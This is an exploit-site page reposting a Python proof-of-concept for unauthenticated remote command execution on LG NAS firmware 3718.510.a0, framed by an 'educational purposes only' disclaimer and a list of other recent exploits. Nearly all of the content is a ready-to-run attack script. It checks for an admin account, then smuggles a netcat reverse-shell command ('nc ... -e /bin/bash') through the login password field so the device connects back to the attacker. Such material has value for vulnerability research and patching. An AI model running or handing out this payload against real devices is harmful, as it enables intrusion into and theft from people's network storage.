Lg nas 3718.510.a0 remote command execution Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-07-31 | Type : webapps | Platform : hardware
This exploit / vulnerability Lg nas 3718.510.a0 remote command execution is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# LG NAS 3718.510.a0 - Remote Command Execution
# Author: @0x616163
# Date: 2018-07-29
# Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
# CVE: N/A
# Firmware Version: 3718.510.a0

#!/usr/bin/env python

import sys
import argparse
import requests
from collections import OrderedDict

def checkUser(target):
# Exploiting this vulnerability requires a valid user account
# on the target NAS otherwise the vulnerable code is not executed
parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass'), ('mobile', 'false')])
r = requests.post("http://" + target + ":8000/en/php/login_check.php", data=parameters)
if r.text == "NG:WRONG PASSWORD\n":
print "[*] Valid user found: admin"
return 0
elif r.text == "NG:NO USER\n":
print "[*] User not found: admin"
sys.exit(1)

def sendPayload(target,lhost,lport):
print "[*] Sending payload.."
try:
parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass;/usr/bin/nc ' + lhost + " " + lport + " " + '-e /bin/bash'), ('mobile', 'false')])
r = requests.post("http://" + target + "/en/php/login_check.php", data=parameters,timeout=0.001)
except requests.exceptions.ReadTimeout:
print "[*] Payload sent. Exiting."
sys.exit(0)

return 0
def main():
parser = argparse.ArgumentParser(add_help=True, description='LG NAS Unauthenticated Remote Code Execution')
parser.add_argument('-t', action="store", dest='target', help='Target host or IP')
parser.add_argument('-l', action="store", dest='lhost', help='Local host or IP')
parser.add_argument('-p', action="store", dest='lport', help='Listening TCP port to connect back to')
results = parser.parse_args()
args = vars(results)
if len(sys.argv) < 1:
parser.print_help()
sys.exit(1)
else:
if checkUser(args['target']) == 0:
sendPayload(args['target'], args['lhost'],args['lport'])

main()
sys.exit(0)

Lg nas 3718.510.a0 remote command execution


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Lg nas 3718.510.a0 remote command execution Vulnerability / Exploit